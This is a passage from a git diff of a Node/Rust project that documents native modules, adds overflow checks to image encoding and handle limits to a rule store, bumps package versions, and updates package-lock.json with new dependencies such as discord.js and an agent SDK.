Supports common formats (PNG, JPEG, WebP) and provides efficient thumbnail generation. + +### json_parse + +JSON parsing utilities. Provides streaming and fault-tolerant JSON parsing for large or partially valid payloads. + +### ps + +Cross-platform process tree management. Lists, inspects, and terminates process trees by PID, used for managing spawned subprocesses. + +### stream_process + +Streaming process I/O. Spawns child processes with non-blocking, streamed access to stdout and stderr for real-time output handling. + +### task + +Task-related native operations. Provides low-level primitives for task scheduling and execution within the native layer. + +### text + +ANSI-aware text measurement and wrapping. Correctly measures visible width of strings containing ANSI escape codes and wraps text to terminal column widths. + +### truncate + +Text truncation utilities. Truncates strings to a target length while preserving ANSI sequences and respecting grapheme boundaries. + +### ttsr + +Tool-triggered system rules. Evaluates and applies system-level rules that activate in response to specific tool invocations. + +### xxhash + +xxHash hashing. Provides fast, non-cryptographic hashing via the xxHash algorithm for content deduplication and cache keying. + ## Adding New Modules 1. 
Create a new crate in `native/crates/` (pure Rust library) diff --git a/native/crates/engine/src/glob.rs b/native/crates/engine/src/glob.rs index ed17b5b3c..61be0e1de 100644 --- a/native/crates/engine/src/glob.rs +++ b/native/crates/engine/src/glob.rs @@ -254,7 +254,7 @@ pub fn glob( let ct = task::CancelToken::new(timeout_ms); task::blocking("glob", ct, move |ct| { - run_glob( + let result = run_glob( GlobConfig { root: fs_cache::resolve_search_path(&path)?, include_hidden: hidden.unwrap_or(false), @@ -270,6 +270,10 @@ pub fn glob( }, on_match.as_ref(), ct, - ) + ); + // Explicitly drop the ThreadsafeFunction to release the N-API reference + // immediately rather than relying on implicit drop ordering. + drop(on_match); + result }) } diff --git a/native/crates/engine/src/image.rs b/native/crates/engine/src/image.rs index 22969ef30..7481e9f7e 100644 --- a/native/crates/engine/src/image.rs +++ b/native/crates/engine/src/image.rs @@ -103,31 +103,42 @@ fn decode_image_from_bytes(bytes: &[u8]) -> Result { .map_err(|e| Error::from_reason(format!("Failed to decode image: {e}"))) } +/// Compute a capacity hint for the encode buffer using checked arithmetic. +/// +/// Returns an error instead of panicking when `w * h * bytes_per_pixel` +/// overflows `usize`. 
+fn encode_capacity(w: u32, h: u32, bytes_per_pixel: usize) -> Result { + (w as usize) + .checked_mul(h as usize) + .and_then(|wh| wh.checked_mul(bytes_per_pixel)) + .ok_or_else(|| Error::from_reason("Image dimensions too large for encode buffer")) +} + fn encode_image(img: &DynamicImage, format: u8, quality: u8) -> Result> { let (w, h) = (img.width(), img.height()); match format { 0 => { - let mut buffer = Vec::with_capacity((w * h * 4) as usize); + let mut buffer = Vec::with_capacity(encode_capacity(w, h, 4)?); img.write_to(&mut Cursor::new(&mut buffer), ImageFormat::Png) .map_err(|e| Error::from_reason(format!("Failed to encode PNG: {e}")))?; Ok(buffer) }, 1 => { - let mut buffer = Vec::with_capacity((w * h * 3) as usize); + let mut buffer = Vec::with_capacity(encode_capacity(w, h, 3)?); let encoder = JpegEncoder::new_with_quality(&mut buffer, quality); img.write_with_encoder(encoder) .map_err(|e| Error::from_reason(format!("Failed to encode JPEG: {e}")))?; Ok(buffer) }, 2 => { - let mut buffer = Vec::with_capacity((w * h * 4) as usize); + let mut buffer = Vec::with_capacity(encode_capacity(w, h, 4)?); let encoder = WebPEncoder::new_lossless(&mut buffer); img.write_with_encoder(encoder) .map_err(|e| Error::from_reason(format!("Failed to encode WebP: {e}")))?; Ok(buffer) }, 3 => { - let mut buffer = Vec::with_capacity((w * h) as usize); + let mut buffer = Vec::with_capacity(encode_capacity(w, h, 1)?); img.write_to(&mut Cursor::new(&mut buffer), ImageFormat::Gif) .map_err(|e| Error::from_reason(format!("Failed to encode GIF: {e}")))?; Ok(buffer) diff --git a/native/crates/engine/src/ttsr.rs b/native/crates/engine/src/ttsr.rs index 571105936..7a513c7c9 100644 --- a/native/crates/engine/src/ttsr.rs +++ b/native/crates/engine/src/ttsr.rs @@ -34,6 +34,15 @@ pub struct NapiTtsrRuleInput { pub conditions: Vec, } +/// Maximum number of live handles allowed before we refuse to allocate more. +/// Prevents unbounded memory growth if JS callers forget to free handles. 
+const MAX_LIVE_HANDLES: usize = 10_000; + +/// Lock the global STORE, recovering gracefully from mutex poisoning. +fn lock_store() -> std::sync::MutexGuard<'static, HashMap> { + STORE.lock().unwrap_or_else(|e| e.into_inner()) +} + /// Compile a set of TTSR rules into an optimized regex engine. /// /// Returns an opaque numeric handle. Each rule has one or more regex condition @@ -69,10 +78,13 @@ pub fn ttsr_compile_rules(rules: Vec) -> Result { mappings, }; - STORE - .lock() - .map_err(|e| Error::from_reason(format!("Lock poisoned: {e}")))? - .insert(handle, compiled); + let mut store = lock_store(); + if store.len() >= MAX_LIVE_HANDLES { + return Err(Error::from_reason(format!( + "TTSR handle limit reached ({MAX_LIVE_HANDLES}). Free unused handles before compiling more rules." + ))); + } + store.insert(handle, compiled); // Return as f64 since napi BigInt interop is awkward; handles won't exceed 2^53. Ok(handle as f64) @@ -86,9 +98,13 @@ pub fn ttsr_compile_rules(rules: Vec) -> Result { pub fn ttsr_check_buffer(handle: f64, buffer: String) -> Result> { let handle_key = handle as u64; - let store = STORE - .lock() - .map_err(|e| Error::from_reason(format!("Lock poisoned: {e}")))?; + // Bounds-check: reject handles that were never allocated. + let upper_bound = NEXT_HANDLE.load(Ordering::Relaxed); + if handle_key == 0 || handle_key >= upper_bound { + return Err(Error::from_reason(format!("Invalid TTSR handle: {handle}"))); + } + + let store = lock_store(); let compiled = store .get(&handle_key) @@ -114,11 +130,14 @@ pub fn ttsr_check_buffer(handle: f64, buffer: String) -> Result> { #[napi(js_name = "ttsrFreeRules")] pub fn ttsr_free_rules(handle: f64) -> Result<()> { let handle_key = handle as u64; - - STORE - .lock() - .map_err(|e| Error::from_reason(format!("Lock poisoned: {e}")))? - .remove(&handle_key); - + lock_store().remove(&handle_key); Ok(()) } + +/// Free all compiled TTSR rule sets, releasing all memory. 
+/// +/// Useful for process cleanup or tests that need a fresh state. +#[napi(js_name = "ttsrClearAll")] +pub fn ttsr_clear_all() { + lock_store().clear(); +} diff --git a/native/npm/darwin-arm64/package.json b/native/npm/darwin-arm64/package.json index 63bbc0a5a..b353e5395 100644 --- a/native/npm/darwin-arm64/package.json +++ b/native/npm/darwin-arm64/package.json @@ -1,6 +1,6 @@ { "name": "@gsd-build/engine-darwin-arm64", - "version": "2.41.0", + "version": "2.67.0", "description": "GSD native engine binary for macOS ARM64", "os": [ "darwin" diff --git a/native/npm/darwin-x64/package.json b/native/npm/darwin-x64/package.json index 8c35ac1ae..130b0a8d8 100644 --- a/native/npm/darwin-x64/package.json +++ b/native/npm/darwin-x64/package.json @@ -1,6 +1,6 @@ { "name": "@gsd-build/engine-darwin-x64", - "version": "2.41.0", + "version": "2.67.0", "description": "GSD native engine binary for macOS Intel", "os": [ "darwin" diff --git a/native/npm/linux-arm64-gnu/package.json b/native/npm/linux-arm64-gnu/package.json index f4d9c1d7e..451c3a006 100644 --- a/native/npm/linux-arm64-gnu/package.json +++ b/native/npm/linux-arm64-gnu/package.json @@ -1,6 +1,6 @@ { "name": "@gsd-build/engine-linux-arm64-gnu", - "version": "2.41.0", + "version": "2.67.0", "description": "GSD native engine binary for Linux ARM64 (glibc)", "os": [ "linux" diff --git a/native/npm/linux-x64-gnu/package.json b/native/npm/linux-x64-gnu/package.json index edfb90185..388821fd1 100644 --- a/native/npm/linux-x64-gnu/package.json +++ b/native/npm/linux-x64-gnu/package.json @@ -1,6 +1,6 @@ { "name": "@gsd-build/engine-linux-x64-gnu", - "version": "2.41.0", + "version": "2.67.0", "description": "GSD native engine binary for Linux x64 (glibc)", "os": [ "linux" diff --git a/native/npm/win32-x64-msvc/package.json b/native/npm/win32-x64-msvc/package.json index 84e34fa68..31ef4a6b7 100644 --- a/native/npm/win32-x64-msvc/package.json +++ b/native/npm/win32-x64-msvc/package.json @@ -1,6 +1,6 @@ { "name": 
"@gsd-build/engine-win32-x64-msvc", - "version": "2.41.0", + "version": "2.67.0", "description": "GSD native engine binary for Windows x64 (MSVC)", "os": [ "win32" diff --git a/package-lock.json b/package-lock.json index c5d64fb9d..cae86f699 100644 --- a/package-lock.json +++ b/package-lock.json @@ -1,12 +1,12 @@ { "name": "gsd-pi", - "version": "2.40.0", + "version": "2.66.1", "lockfileVersion": 3, "requires": true, "packages": { "": { "name": "gsd-pi", - "version": "2.40.0", + "version": "2.66.1", "hasInstallScript": true, "license": "MIT", "workspaces": [ @@ -61,6 +61,7 @@ "@types/node": "^24.12.0", "@types/picomatch": "^4.0.2", "c8": "^11.0.0", + "esbuild": "^0.25.12", "jiti": "^2.6.1", "typescript": "^5.4.0" }, @@ -68,6 +69,7 @@ "node": ">=22.0.0" }, "optionalDependencies": { + "@anthropic-ai/claude-agent-sdk": "^0.2.83", "@gsd-build/engine-darwin-arm64": ">=2.10.2", "@gsd-build/engine-darwin-x64": ">=2.10.2", "@gsd-build/engine-linux-arm64-gnu": ">=2.10.2", @@ -77,6 +79,30 @@ "koffi": "^2.9.0" } }, + "node_modules/@anthropic-ai/claude-agent-sdk": { + "version": "0.2.83", + "resolved": "https://registry.npmjs.org/@anthropic-ai/claude-agent-sdk/-/claude-agent-sdk-0.2.83.tgz", + "integrity": "sha512-O8g56htGMxrwbjCbqUqRBMNC0O98B7SkPnfQC7vmo3w2DVnUrBj3qat/IBLB8SI4sjVSZHeJrcK7+ozsCzStSw==", + "license": "SEE LICENSE IN README.md", + "optional": true, + "engines": { + "node": ">=18.0.0" + }, + "optionalDependencies": { + "@img/sharp-darwin-arm64": "^0.34.2", + "@img/sharp-darwin-x64": "^0.34.2", + "@img/sharp-linux-arm": "^0.34.2", + "@img/sharp-linux-arm64": "^0.34.2", + "@img/sharp-linux-x64": "^0.34.2", + "@img/sharp-linuxmusl-arm64": "^0.34.2", + "@img/sharp-linuxmusl-x64": "^0.34.2", + "@img/sharp-win32-arm64": "^0.34.2", + "@img/sharp-win32-x64": "^0.34.2" + }, + "peerDependencies": { + "zod": "^4.0.0" + } + }, "node_modules/@anthropic-ai/sdk": { "version": "0.73.0", "resolved": "https://registry.npmjs.org/@anthropic-ai/sdk/-/sdk-0.73.0.tgz", @@ -820,13 
+846,13 @@ } }, "node_modules/@aws-sdk/xml-builder": { - "version": "3.972.10", - "resolved": "https://registry.npmjs.org/@aws-sdk/xml-builder/-/xml-builder-3.972.10.tgz", - "integrity": "sha512-OnejAIVD+CxzyAUrVic7lG+3QRltyja9LoNqCE/1YVs8ichoTbJlVSaZ9iSMcnHLyzrSNtvaOGjSDRP+d/ouFA==", + "version": "3.972.17", + "resolved": "https://registry.npmjs.org/@aws-sdk/xml-builder/-/xml-builder-3.972.17.tgz", + "integrity": "sha512-Ra7hjqAZf1OXRRMueB13qex7mFJRDK/pgCvdSFemXBT8KCGnQDPoKzHY1SjN+TjJVmnpSF14W5tJ1vDamFu+Gg==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.0", - "fast-xml-parser": "5.4.1", + "@smithy/types": "^4.14.0", + "fast-xml-parser": "5.5.8", "tslib": "^2.6.2" }, "engines": { @@ -1218,6 +1244,155 @@ "sisteransi": "^1.0.5" } }, + "node_modules/@discordjs/builders": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@discordjs/builders/-/builders-1.14.1.tgz", + "integrity": "sha512-gSKkhXLqs96TCzk66VZuHHl8z2bQMJFGwrXC0f33ngK+FLNau4hU1PYny3DNJfNdSH+gVMzE85/d5FQ2BpcNwQ==", + "license": "Apache-2.0", + "dependencies": { + "@discordjs/formatters": "^0.6.2", + "@discordjs/util": "^1.2.0", + "@sapphire/shapeshift": "^4.0.0", + "discord-api-types": "^0.38.40", + "fast-deep-equal": "^3.1.3", + "ts-mixer": "^6.0.4", + "tslib": "^2.6.3" + }, + "engines": { + "node": ">=16.11.0" + }, + "funding": { + "url": "https://github.com/discordjs/discord.js?sponsor" + } + }, + "node_modules/@discordjs/collection": { + "version": "1.5.3", + "resolved": "https://registry.npmjs.org/@discordjs/collection/-/collection-1.5.3.tgz", + "integrity": "sha512-SVb428OMd3WO1paV3rm6tSjM4wC+Kecaa1EUGX7vc6/fddvw/6lg90z4QtCqm21zvVe92vMMDt9+DkIvjXImQQ==", + "license": "Apache-2.0", + "engines": { + "node": ">=16.11.0" + } + }, + "node_modules/@discordjs/formatters": { + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/@discordjs/formatters/-/formatters-0.6.2.tgz", + "integrity": 
"sha512-y4UPwWhH6vChKRkGdMB4odasUbHOUwy7KL+OVwF86PvT6QVOwElx+TiI1/6kcmcEe+g5YRXJFiXSXUdabqZOvQ==", + "license": "Apache-2.0", + "dependencies": { + "discord-api-types": "^0.38.33" + }, + "engines": { + "node": ">=16.11.0" + }, + "funding": { + "url": "https://github.com/discordjs/discord.js?sponsor" + } + }, + "node_modules/@discordjs/rest": { + "version": "2.6.1", + "resolved": "https://registry.npmjs.org/@discordjs/rest/-/rest-2.6.1.tgz", + "integrity": "sha512-wwQdgjeaoYFiaG+atbqx6aJDpqW7JHAo0HrQkBTbYzM3/PJ3GweQIpgElNcGZ26DCUOXMyawYd0YF7vtr+fZXg==", + "license": "Apache-2.0", + "dependencies": { + "@discordjs/collection": "^2.1.1", + "@discordjs/util": "^1.2.0", + "@sapphire/async-queue": "^1.5.3", + "@sapphire/snowflake": "^3.5.5", + "@vladfrangu/async_event_emitter": "^2.4.6", + "discord-api-types": "^0.38.40", + "magic-bytes.js": "^1.13.0", + "tslib": "^2.6.3", + "undici": "6.24.1" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/discordjs/discord.js?sponsor" + } + }, + "node_modules/@discordjs/rest/node_modules/@discordjs/collection": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/@discordjs/collection/-/collection-2.1.1.tgz", + "integrity": "sha512-LiSusze9Tc7qF03sLCujF5iZp7K+vRNEDBZ86FT9aQAv3vxMLihUvKvpsCWiQ2DJq1tVckopKm1rxomgNUc9hg==", + "license": "Apache-2.0", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/discordjs/discord.js?sponsor" + } + }, + "node_modules/@discordjs/rest/node_modules/@sapphire/snowflake": { + "version": "3.5.5", + "resolved": "https://registry.npmjs.org/@sapphire/snowflake/-/snowflake-3.5.5.tgz", + "integrity": "sha512-xzvBr1Q1c4lCe7i6sRnrofxeO1QTP/LKQ6A6qy0iB4x5yfiSfARMEQEghojzTNALDTcv8En04qYNIco9/K9eZQ==", + "license": "MIT", + "engines": { + "node": ">=v14.0.0", + "npm": ">=7.0.0" + } + }, + "node_modules/@discordjs/rest/node_modules/undici": { + "version": "6.24.1", + "resolved": "https://registry.npmjs.org/undici/-/undici-6.24.1.tgz", + 
"integrity": "sha512-sC+b0tB1whOCzbtlx20fx3WgCXwkW627p4EA9uM+/tNNPkSS+eSEld6pAs9nDv7WbY1UUljBMYPtu9BCOrCWKA==", + "license": "MIT", + "engines": { + "node": ">=18.17" + } + }, + "node_modules/@discordjs/util": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/@discordjs/util/-/util-1.2.0.tgz", + "integrity": "sha512-3LKP7F2+atl9vJFhaBjn4nOaSWahZ/yWjOvA4e5pnXkt2qyXRCHLxoBQy81GFtLGCq7K9lPm9R517M1U+/90Qg==", + "license": "Apache-2.0", + "dependencies": { + "discord-api-types": "^0.38.33" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/discordjs/discord.js?sponsor" + } + }, + "node_modules/@discordjs/ws": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/@discordjs/ws/-/ws-1.2.3.tgz", + "integrity": "sha512-wPlQDxEmlDg5IxhJPuxXr3Vy9AjYq5xCvFWGJyD7w7Np8ZGu+Mc+97LCoEc/+AYCo2IDpKioiH0/c/mj5ZR9Uw==", + "license": "Apache-2.0", + "dependencies": { + "@discordjs/collection": "^2.1.0", + "@discordjs/rest": "^2.5.1", + "@discordjs/util": "^1.1.0", + "@sapphire/async-queue": "^1.5.2", + "@types/ws": "^8.5.10", + "@vladfrangu/async_event_emitter": "^2.2.4", + "discord-api-types": "^0.38.1", + "tslib": "^2.6.2", + "ws": "^8.17.0" + }, + "engines": { + "node": ">=16.11.0" + }, + "funding": { + "url": "https://github.com/discordjs/discord.js?sponsor" + } + }, + "node_modules/@discordjs/ws/node_modules/@discordjs/collection": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/@discordjs/collection/-/collection-2.1.1.tgz", + "integrity": "sha512-LiSusze9Tc7qF03sLCujF5iZp7K+vRNEDBZ86FT9aQAv3vxMLihUvKvpsCWiQ2DJq1tVckopKm1rxomgNUc9hg==", + "license": "Apache-2.0", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/discordjs/discord.js?sponsor" + } + }, "node_modules/@electron/get": { "version": "2.0.3", "resolved": "https://registry.npmjs.org/@electron/get/-/get-2.0.3.tgz", @@ -1725,6 +1900,10 @@ } } }, + "node_modules/@gsd-build/daemon": { + "resolved": "packages/daemon", 
+ "link": true + }, "node_modules/@gsd-build/engine-darwin-arm64": { "version": "2.10.5", "resolved": "https://registry.npmjs.org/@gsd-build/engine-darwin-arm64/-/engine-darwin-arm64-2.10.5.tgz", @@ -1790,6 +1969,14 @@ "win32" ] }, + "node_modules/@gsd-build/mcp-server": { + "resolved": "packages/mcp-server", + "link": true + }, + "node_modules/@gsd-build/rpc-client": { + "resolved": "packages/rpc-client", + "link": true + }, "node_modules/@gsd/native": { "resolved": "packages/native", "link": true @@ -1815,9 +2002,9 @@ "link": true }, "node_modules/@hono/node-server": { - "version": "1.19.11", - "resolved": "https://registry.npmjs.org/@hono/node-server/-/node-server-1.19.11.tgz", - "integrity": "sha512-dr8/3zEaB+p0D2n/IUrlPF1HZm586qgJNXK1a9fhg/PzdtkK7Ksd5l312tJX2yBuALqDYBlG20QEbayqPyxn+g==", + "version": "1.19.13", + "resolved": "https://registry.npmjs.org/@hono/node-server/-/node-server-1.19.13.tgz", + "integrity": "sha512-TsQLe4i2gvoTtrHje625ngThGBySOgSK3Xo2XRYOdqGN1teR8+I7vchQC46uLJi8OF62YTYA3AhSpumtkhsaKQ==", "license": "MIT", "engines": { "node": ">=18.14.1" @@ -3028,6 +3215,39 @@ ], "peer": true }, + "node_modules/@sapphire/async-queue": { + "version": "1.5.5", + "resolved": "https://registry.npmjs.org/@sapphire/async-queue/-/async-queue-1.5.5.tgz", + "integrity": "sha512-cvGzxbba6sav2zZkH8GPf2oGk9yYoD5qrNWdu9fRehifgnFZJMV+nuy2nON2roRO4yQQ+v7MK/Pktl/HgfsUXg==", + "license": "MIT", + "engines": { + "node": ">=v14.0.0", + "npm": ">=7.0.0" + } + }, + "node_modules/@sapphire/shapeshift": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@sapphire/shapeshift/-/shapeshift-4.0.0.tgz", + "integrity": "sha512-d9dUmWVA7MMiKobL3VpLF8P2aeanRTu6ypG2OIaEv/ZHH/SUQ2iHOVyi5wAPjQ+HmnMuL0whK9ez8I/raWbtIg==", + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "lodash": "^4.17.21" + }, + "engines": { + "node": ">=v16" + } + }, + "node_modules/@sapphire/snowflake": { + "version": "3.5.3", + "resolved": 
"https://registry.npmjs.org/@sapphire/snowflake/-/snowflake-3.5.3.tgz", + "integrity": "sha512-jjmJywLAFoWeBi1W7994zZyiNWPIiqRRNAmSERxyg93xRGzNYvGjlZ0gR6x0F4gPRi2+0O6S71kOZYyr3cxaIQ==", + "license": "MIT", + "engines": { + "node": ">=v14.0.0", + "npm": ">=7.0.0" + } + }, "node_modules/@silvia-odwyer/photon-node": { "version": "0.3.4", "resolved": "https://registry.npmjs.org/@silvia-odwyer/photon-node/-/photon-node-0.3.4.tgz", @@ -3474,9 +3694,9 @@ } }, "node_modules/@smithy/types": { - "version": "4.13.1", - "resolved": "https://registry.npmjs.org/@smithy/types/-/types-4.13.1.tgz", - "integrity": "sha512-787F3yzE2UiJIQ+wYW1CVg2odHjmaWLGksnKQHUrK/lYZSEcy1msuLVvxaR/sI2/aDe9U+TBuLsXnr3vod1g0g==", + "version": "4.14.0", + "resolved": "https://registry.npmjs.org/@smithy/types/-/types-4.14.0.tgz", + "integrity": "sha512-OWgntFLW88kx2qvf/c/67Vno1yuXm/f9M7QFAtVkkO29IJXGBIg0ycEaBTH0kvCtwmvZxRujrgP5a86RvsXJAQ==", "license": "Apache-2.0", "dependencies": { "tslib": "^2.6.2" @@ -4208,6 +4428,15 @@ "@types/node": "*" } }, + "node_modules/@types/ws": { + "version": "8.18.1", + "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.18.1.tgz", + "integrity": "sha512-ThVF6DCVhA8kUGy+aazFQ4kXQ7E1Ty7A3ypFOe0IcJV8O/M511G99AW24irKrW56Wt44yG9+ij8FaqoBGkuBXg==", + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, "node_modules/@types/yauzl": { "version": "2.10.3", "resolved": "https://registry.npmjs.org/@types/yauzl/-/yauzl-2.10.3.tgz", @@ -4239,6 +4468,16 @@ "vite": "^4.2.0 || ^5.0.0 || ^6.0.0 || ^7.0.0 || ^8.0.0" } }, + "node_modules/@vladfrangu/async_event_emitter": { + "version": "2.4.7", + "resolved": "https://registry.npmjs.org/@vladfrangu/async_event_emitter/-/async_event_emitter-2.4.7.tgz", + "integrity": "sha512-Xfe6rpCTxSxfbswi/W/Pz7zp1WWSNn4A0eW4mLkQUewCrXXtMj31lCg+iQyTkh/CkusZSq9eDflu7tjEDXUY6g==", + "license": "MIT", + "engines": { + "node": ">=v14.0.0", + "npm": ">=7.0.0" + } + }, "node_modules/accepts": { "version": "2.0.0", "resolved": 
"https://registry.npmjs.org/accepts/-/accepts-2.0.0.tgz", @@ -4377,9 +4616,9 @@ } }, "node_modules/basic-ftp": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/basic-ftp/-/basic-ftp-5.2.0.tgz", - "integrity": "sha512-VoMINM2rqJwJgfdHq6RiUudKt2BV+FY5ZFezP/ypmwayk68+NzzAQy4XXLlqsGD4MCzq3DrmNFD/uUmBJuGoXw==", + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/basic-ftp/-/basic-ftp-5.2.1.tgz", + "integrity": "sha512-0yaL8JdxTknKDILitVpfYfV2Ob6yb3udX/hK97M7I3jOeznBNxQPtVvTUtnhUkyHlxFWyr5Lvknmgzoc7jf+1Q==", "license": "MIT", "engines": { "node": ">=10.0.0" @@ -4440,9 +4679,9 @@ "license": "MIT" }, "node_modules/brace-expansion": { - "version": "5.0.4", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-5.0.4.tgz", - "integrity": "sha512-h+DEnpVvxmfVefa4jFbCf5HdH5YMDXRsmKflpf1pILZWRFlTbJpxeU55nJl4Smt5HQaGzg1o6RHFPJaOqnmBDg==", + "version": "5.0.5", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-5.0.5.tgz", + "integrity": "sha512-VZznLgtwhn+Mact9tfiwx64fA9erHH/MCXEUfB/0bX/6Fz6ny5EGTXYltMocqg4xFAQZtnO3DHWWXi8RiuN7cQ==", "license": "MIT", "dependencies": { "balanced-match": "^4.0.2" @@ -4967,6 +5206,51 @@ "node": ">=0.3.1" } }, + "node_modules/discord-api-types": { + "version": "0.38.42", + "resolved": "https://registry.npmjs.org/discord-api-types/-/discord-api-types-0.38.42.tgz", + "integrity": "sha512-qs1kya7S84r5RR8m9kgttywGrmmoHaRifU1askAoi+wkoSefLpZP6aGXusjNw5b0jD3zOg3LTwUa3Tf2iHIceQ==", + "license": "MIT", + "workspaces": [ + "scripts/actions/documentation" + ] + }, + "node_modules/discord.js": { + "version": "14.26.2", + "resolved": "https://registry.npmjs.org/discord.js/-/discord.js-14.26.2.tgz", + "integrity": "sha512-feShi+gULJ6R2MAA4/KkCFnkJcuVrROJrKk4czplzq8gE1oqhqgOy9K0Scu44B8oGeWKe04egquzf+ia6VtXAw==", + "license": "Apache-2.0", + "dependencies": { + "@discordjs/builders": "^1.14.1", + "@discordjs/collection": "1.5.3", + "@discordjs/formatters": "^0.6.2", + "@discordjs/rest": 
"^2.6.1", + "@discordjs/util": "^1.2.0", + "@discordjs/ws": "^1.2.3", + "@sapphire/snowflake": "3.5.3", + "discord-api-types": "^0.38.40", + "fast-deep-equal": "3.1.3", + "lodash.snakecase": "4.1.1", + "magic-bytes.js": "^1.13.0", + "tslib": "^2.6.3", + "undici": "6.24.1" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/discordjs/discord.js?sponsor" + } + }, + "node_modules/discord.js/node_modules/undici": { + "version": "6.24.1", + "resolved": "https://registry.npmjs.org/undici/-/undici-6.24.1.tgz", + "integrity": "sha512-sC+b0tB1whOCzbtlx20fx3WgCXwkW627p4EA9uM+/tNNPkSS+eSEld6pAs9nDv7WbY1UUljBMYPtu9BCOrCWKA==", + "license": "MIT", + "engines": { + "node": ">=18.17" + } + }, "node_modules/dunder-proto": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", @@ -4997,9 +5281,9 @@ "license": "MIT" }, "node_modules/electron": { - "version": "41.0.3", - "resolved": "https://registry.npmjs.org/electron/-/electron-41.0.3.tgz", - "integrity": "sha512-IDjx8liW1q+r7+MOip5W1Eo1eMwJzVObmYrd9yz2dPCkS7XlgLq3qPVMR80TpiROFp73iY30kTzMdpA6fEVs3A==", + "version": "41.2.0", + "resolved": "https://registry.npmjs.org/electron/-/electron-41.2.0.tgz", + "integrity": "sha512-0OKLiymqfV0WK68RBXqAm3Myad2TpI5wwxLCBEUcH5Nugo3YfSk7p1Js/AL9266qTz5xZioUnxt9hG8FFwax0g==", "dev": true, "hasInstallScript": true, "license": "MIT", @@ -5419,9 +5703,9 @@ "license": "BSD-3-Clause" }, "node_modules/fast-xml-builder": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.2.tgz", - "integrity": "sha512-NJAmiuVaJEjVa7TjLZKlYd7RqmzOC91EtPFXHvlTcqBVo50Qh7XV5IwvXi1c7NRz2Q/majGX9YLcwJtWgHjtkA==", + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.4.tgz", + "integrity": "sha512-f2jhpN4Eccy0/Uz9csxh3Nu6q4ErKxf0XIsasomfOihuSUa3/xw6w8dnOtCDgEItQFJG8KyXPzQXzcODDrrbOg==", "funding": [ { "type": "github", @@ -5434,9 +5718,9 @@ } }, 
"node_modules/fast-xml-parser": { - "version": "5.4.1", - "resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.4.1.tgz", - "integrity": "sha512-BQ30U1mKkvXQXXkAGcuyUA/GA26oEB7NzOtsxCDtyu62sjGw5QraKFhx2Em3WQNjPw9PG6MQ9yuIIgkSDfGu5A==", + "version": "5.5.8", + "resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.5.8.tgz", + "integrity": "sha512-Z7Fh2nVQSb2d+poDViM063ix2ZGt9jmY1nWhPfHBOK2Hgnb/OW3P4Et3P/81SEej0J7QbWtJqxO05h8QYfK7LQ==", "funding": [ { "type": "github", @@ -5445,8 +5729,9 @@ ], "license": "MIT", "dependencies": { - "fast-xml-builder": "^1.0.0", - "strnum": "^2.1.2" + "fast-xml-builder": "^1.1.4", + "path-expression-matcher": "^1.2.0", + "strnum": "^2.2.0" }, "bin": { "fxparser": "src/cli/cli.js" @@ -5504,9 +5789,9 @@ } }, "node_modules/file-type": { - "version": "21.3.1", - "resolved": "https://registry.npmjs.org/file-type/-/file-type-21.3.1.tgz", - "integrity": "sha512-SrzXX46I/zsRDjTb82eucsGg0ODq2NpGDp4HcsFKApPy8P8vACjpJRDoGGMfEzhFC0ry61ajd7f72J3603anBA==", + "version": "21.3.4", + "resolved": "https://registry.npmjs.org/file-type/-/file-type-21.3.4.tgz", + "integrity": "sha512-Ievi/yy8DS3ygGvT47PjSfdFoX+2isQueoYP1cntFW1JLYAuS4GD7NUPGg4zv2iZfV52uDyk5w5Z0TdpRS6Q1g==", "license": "MIT", "dependencies": { "@tokenizer/inflate": "^0.4.1", @@ -5978,9 +6263,9 @@ } }, "node_modules/hono": { - "version": "4.12.8", - "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.8.tgz", - "integrity": "sha512-VJCEvtrezO1IAR+kqEYnxUOoStaQPGrCmX3j4wDTNOcD1uRPFpGlwQUIW8niPuvHXaTUxeOUl5MMDGrl+tmO9A==", + "version": "4.12.12", + "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.12.tgz", + "integrity": "sha512-p1JfQMKaceuCbpJKAPKVqyqviZdS0eUxH9v82oWo1kb9xjQ5wA6iP3FNVAPDFlz5/p7d45lO+BpSk1tuSZMF4Q==", "license": "MIT", "engines": { "node": ">=16.9.0" @@ -6638,6 +6923,18 @@ "url": "https://github.com/sponsors/sindresorhus" } }, + "node_modules/lodash": { + "version": "4.18.1", + "resolved": 
